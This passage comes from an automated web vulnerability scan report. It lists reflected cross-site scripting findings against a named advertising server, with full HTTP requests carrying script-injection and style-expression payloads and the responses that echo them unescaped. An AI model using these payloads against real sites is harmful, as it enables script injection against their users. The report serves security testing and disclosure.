Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:45 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 375
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/;
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000050d3a5822e9500000000629f3"><script>alert(1)</script>3010571870b/acc_random=928099946176/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=942103891691" target="_new">
...[SNIP]...

2.665. http://media.sensis.com.au/hserver/acc_random=928099946176/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=942103891691 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=928099946176/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=942103891691

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf187"><script>alert(1)</script>bf9bd5f41cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randombf187"><script>alert(1)</script>bf9bd5f41cd=928099946176/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=942103891691 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: media.sensis.com.au
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:46 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 375
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/;
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000050d3a5822e9500000000/acc_randombf187"><script>alert(1)</script>bf9bd5f41cd=928099946176/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=942103891691" target="_new">
...[SNIP]...

2.666. http://media.sensis.com.au/hserver/acc_random=928099946176/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=942103891691 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=928099946176/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=942103891691

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 871ea"><script>alert(1)</script>5afab616603 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=928099946176/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=942103891691?871ea"><script>alert(1)</script>5afab616603=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: media.sensis.com.au
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:44 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 378
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/;
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000050d3a5822e9500000000/acc_random=928099946176/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=942103891691?871ea"><script>alert(1)</script>5afab616603=1" target="_new">
...[SNIP]...

2.667. http://media.sensis.com.au/hserver/acc_random=937599525359/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=164173303778 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=937599525359/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=164173303778

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76fb8"><script>alert(1)</script>faec95ef93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver76fb8"><script>alert(1)</script>faec95ef93/acc_random=937599525359/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=164173303778 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:51 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 474
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00030868000000000000000076fb8"><script>alert(1)</script>faec95ef93/acc_random=937599525359/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=164173303778/relocate=http://clk.redcated/O
...[SNIP]...

2.668. http://media.sensis.com.au/hserver/acc_random=937599525359/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=164173303778 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=937599525359/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=164173303778

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71998"><script>alert(1)</script>8939c80793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random71998"><script>alert(1)</script>8939c80793=937599525359/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=164173303778 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:52 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 668
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00031a960000000000000000/acc_random71998"><script>alert(1)</script>8939c80793=937599525359/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=164173303778/relocate=http://bs.serving-sys.com/Burstin
...[SNIP]...

2.669. http://media.sensis.com.au/hserver/acc_random=937599525359/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=164173303778 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=937599525359/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=164173303778

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65fc7"><script>alert(1)</script>5335895e23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=937599525359/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=164173303778?65fc7"><script>alert(1)</script>5335895e23=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:50 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 695
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00031a960000000000000000/acc_random=937599525359/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=164173303778?65fc7"><script>alert(1)</script>5335895e23=1&relocate=http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=tf&c=20&mc=click&pli=2005956&PluID=0&ord=937599525359" target="_blank">
...[SNIP]...

2.670. http://media.sensis.com.au/hserver/acc_random=954878050949/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=369648929007 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=954878050949/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=369648929007

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 115a1"><script>alert(1)</script>5597740ebe0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver115a1"><script>alert(1)</script>5597740ebe0/acc_random=954878050949/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=369648929007 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:51 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 432
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fda5822e9500000000115a1"><script>alert(1)</script>5597740ebe0/acc_random=954878050949/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=369648929007" target="_new">
...[SNIP]...

2.671. http://media.sensis.com.au/hserver/acc_random=954878050949/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=369648929007 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=954878050949/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=369648929007

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85803"><script>alert(1)</script>008a71f181d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random85803"><script>alert(1)</script>008a71f181d=954878050949/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=369648929007 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:52 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 432
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fda5822e9500000000/acc_random85803"><script>alert(1)</script>008a71f181d=954878050949/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=369648929007" target="_new">
...[SNIP]...

2.672. http://media.sensis.com.au/hserver/acc_random=954878050949/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=369648929007 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=954878050949/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=369648929007

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3255"><script>alert(1)</script>8ee6d667942 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=954878050949/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=369648929007?b3255"><script>alert(1)</script>8ee6d667942=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:50 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 435
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fda5822e9500000000/acc_random=954878050949/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=369648929007?b3255"><script>alert(1)</script>8ee6d667942=1" target="_new">
...[SNIP]...

2.673. http://media.sensis.com.au/hserver/acc_random=955810753905/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=260571614373 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=955810753905/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=260571614373

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57843"><script>alert(1)</script>864e77fc105 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver57843"><script>alert(1)</script>864e77fc105/acc_random=955810753905/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=260571614373 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.gamearena.com.au/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:55 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 470
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033b0c000000000000000057843"><script>alert(1)</script>864e77fc105/acc_random=955810753905/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=260571614373/relocate=http://clk.atdmt.co
...[SNIP]...

2.674. http://media.sensis.com.au/hserver/acc_random=955810753905/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=260571614373 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=955810753905/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=260571614373

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b17b5"><script>alert(1)</script>2df4f010c0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randomb17b5"><script>alert(1)</script>2df4f010c0e=955810753905/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=260571614373 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.gamearena.com.au/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:57 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 2506
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<!--Begin JSERVER Skip-->
<script>
document.write('<scr'+'ipt src="https://ad.au.vulnerable.ad.partner/adj/N799.Sensis12/B4870169.2;click=http://media.sensis.com.au/ADCLICK/CID=00031a5f0000000000000000/ac
...[SNIP]...
<A href="http://media.sensis.com.au/ADCLICK/CID=00031a5f0000000000000000/acc_randomb17b5"><script>alert(1)</script>2df4f010c0e=955810753905/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=260571614373/relocate=https://ad.au.doubleclick.net/
...[SNIP]...

2.675. http://media.sensis.com.au/hserver/acc_random=955810753905/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=260571614373 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
